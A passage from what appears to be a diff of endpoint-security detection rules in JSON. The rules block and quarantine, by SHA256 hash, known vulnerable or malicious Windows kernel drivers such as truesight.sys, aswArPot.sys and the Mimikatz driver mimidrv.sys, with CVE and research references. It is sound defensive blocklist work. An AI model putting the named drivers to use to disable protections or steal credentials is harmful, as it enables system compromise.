"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827637Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5c357ccc50a8511019d0beb93a910bdc3ea7ca5048e41f4f6cfca83cdd53aad9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "13ae6c2e-50e5-5735-b522-9f33e0a477bd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970547Z", + "creation_date": "2026-03-23T11:45:29.970549Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970554Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a0931e16cf7b18d15579e36e0a69edad1717b07527b5407f2c105a2f554224b2", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "13befc9e-fa56-5455-9497-1484c9a473bf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827255Z", + "creation_date": "2026-03-23T11:45:30.827257Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827262Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5472de65d2797e341862f32e40c7e6bc71f0c481a3b7dfc3198b490d7d7427fb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "13c075fb-5eac-503e-bf72-3780ce4ad39c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621089Z", + "creation_date": "2026-03-23T11:45:29.621091Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621096Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7f375639a0df7fe51e5518cf87c3f513c55bc117db47d28da8c615642eb18bfa", + "comment": "CoreTemp Physmem dangerous drivers (aka ALSYSIO64.sys) [https://www.loldrivers.io/drivers/4d365dd0-34c3-492e-a2bd-c16266796ae5/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "13c236a2-a836-530b-82fa-28adad19b6b7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154058Z", + "creation_date": "2026-03-23T11:45:31.154060Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154066Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "39088113e8638c131fe41496671223fcc3c8e08e1a1adc2e48b38b61d3712c19", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "13c6a3cb-2d76-5376-bc4e-9bf8600c5eb4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.474961Z", + "creation_date": "2026-03-23T11:45:31.474965Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.474976Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e07521d559535a1ff648828c885d426cca5fa2b92d6ca2637d985a8fc8b5454d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "13cd0717-534a-50ac-9363-23f9d830eca5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826973Z", + "creation_date": "2026-03-23T11:45:31.826975Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826981Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ad9147b40c939210c0c4ee4f0127a7cb5ef3d6b768835f5be24cc178c8505a40", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "13cef623-5e33-5bfc-bfa0-2d7467f59ff6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970037Z", + "creation_date": "2026-03-23T11:45:29.970039Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970044Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a465cfa7a0bd76dfe8f261661d348e25d1a6a3975673336f90878618f2e6c21b", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "13d71092-fe88-52d5-a1b0-2d5476d6506a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:29.614683Z", + "creation_date": "2026-03-23T11:45:29.614685Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614690Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "89b0017bc30cc026e32b758c66a1af88bd54c6a78e11ec2908ff854e00ac46be", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "13d759f3-a0d4-529f-b2c3-36fc61e6ddd1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.456423Z", + "creation_date": "2026-03-23T11:45:30.456426Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.456435Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e41d4fd99252fcf9aea529b6e148b311aa26a4ab04f6b79cce4cd19c61db0c87", + "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"13d900e8-b51b-5904-a13f-c1e52b3a623e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159140Z", + "creation_date": "2026-03-23T11:45:31.159142Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159148Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6496601ffcf0b20318e0b30958b8d2034604884c8e4f418c1262e31637bff6d1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "13e02b56-cce9-5d64-9bc8-58d126ff8b1c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.456694Z", + "creation_date": "2026-03-23T11:45:30.456697Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.456706Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a92d2736c8cd99195a1ef4d0d9a3412bee481acf585944e3b5946b465361a3e7", + "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "13ed4d8b-d4b7-560a-8efb-1d38a806cdb8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977333Z", + "creation_date": "2026-03-23T11:45:29.977336Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977344Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "455bc98ba32adab8b47d2d89bdbadca4910f91c182ab2fc3211ba07d3784537b", + "comment": "Vulnerable Kernel Driver (aka netfilterdrv.sys) [https://www.loldrivers.io/drivers/f1dcb0e4-aa53-4e62-ab09-fb7b4a356916/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "13f2af91-cd0f-59c0-a9cf-e37ff2460399", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150176Z", + "creation_date": "2026-03-23T11:45:31.150178Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150184Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "23641b9366567f6f8543853b84d8c97d818d848b056e776bb1cafcfecd22bc05", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1403247d-f2d5-5609-b5cb-26c195da03cf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613928Z", + "creation_date": "2026-03-23T11:45:29.613930Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613935Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"3de51a3102db7297d96b4de5b60aca5f3a07e8577bbbed7f755f1de9a9c38e75", + "comment": "BioStar Microtech drivers vulnerable to kernel memory mapping function (aka BSMEMx64.sys, BSMIXP64.sys, BSMIx64.sys, BS_Flash64.sys, BS_HWMIO64_W10.sys, BS_HWMIo64.sys and BS_I2c64.sys) [https://www.loldrivers.io/drivers/9e87b6b0-00ed-4259-bcd7-05e2c924d58c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "140d8201-8d8d-582f-9aff-25aafe5b9440", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606008Z", + "creation_date": "2026-03-23T11:45:29.606009Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606015Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1b00d6e5d40b1b84ca63da0e99246574cdd2a533122bc83746f06c0d66e63a6e", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1414c3db-ab57-5b5c-8025-4208058bcc41", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973450Z", + "creation_date": "2026-03-23T11:45:29.973452Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973457Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1415d079-b077-5e35-9e0a-e7134a8010d4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619558Z", + "creation_date": "2026-03-23T11:45:29.619560Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619565Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f1f345591efe74fd12e706132939f51963eb39dd0a1db556123c3e850c60fada", + "comment": "Insyde 
Software dangerous update tool (aka segwindrvx64.sys) [https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Program%3AWin32%2FVulnInsydeDriver.A&threatid=258247] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "142db16a-a14d-59b9-975b-987aaf865836", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967622Z", + "creation_date": "2026-03-23T11:45:29.967624Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967630Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5c206b569b7059b7c32eb5fc36922cb435c2b16c8d96de1038c8bd298ed498fe", + "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "142e5b48-476f-55e9-8f79-dcdcbf407261", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:30.818295Z", + "creation_date": "2026-03-23T11:45:30.818297Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818302Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9917144b7240b1ce0cadb1210fd26182744fbbdf145943037c4b93e44aced207", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "143c1959-80d3-5468-a6e6-c1d3eed062f9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147893Z", + "creation_date": "2026-03-23T11:45:31.147897Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147906Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fc4dfcb9ddcc41909bf99e4c197da3778afcdf6431862177c289b6200da0ebe8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "144d9b36-3c42-5036-92e6-17a12035fd58", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.466608Z", + "creation_date": "2026-03-23T11:45:30.466611Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.466620Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "aafa642ca3d906138150059eeddb6f6b4fe9ad90c6174386cfe13a13e8be47d9", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "14620831-106c-5eb4-87bb-da564c6a8790", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.816967Z", + "creation_date": "2026-03-23T11:45:31.816969Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.816975Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a54e9e7fb0dd039ffd724cc5203ddcc1dd898c5224ae74e2327d3fa97a309643", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "14665a92-845b-5321-9eab-331660560bad", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150356Z", + "creation_date": "2026-03-23T11:45:31.150358Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150364Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6f571267b63865e23f63bd549e3309f07fb8a5b4421ad6ca1d04eae3d3e90394", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "146b9a56-8b03-55d4-af11-7bbbb9dfe5b4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982940Z", + "creation_date": "2026-03-23T11:45:29.982948Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982953Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5e27fe26110d2b9f6c2bad407d3d0611356576b531564f75ff96f9f72d5fcae4", + "comment": "Vulnerable Kernel Driver (aka WiseUnlo.sys) [https://www.loldrivers.io/drivers/b28cc2ee-d4a2-4fe4-9acb-a7a61cad20c6/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 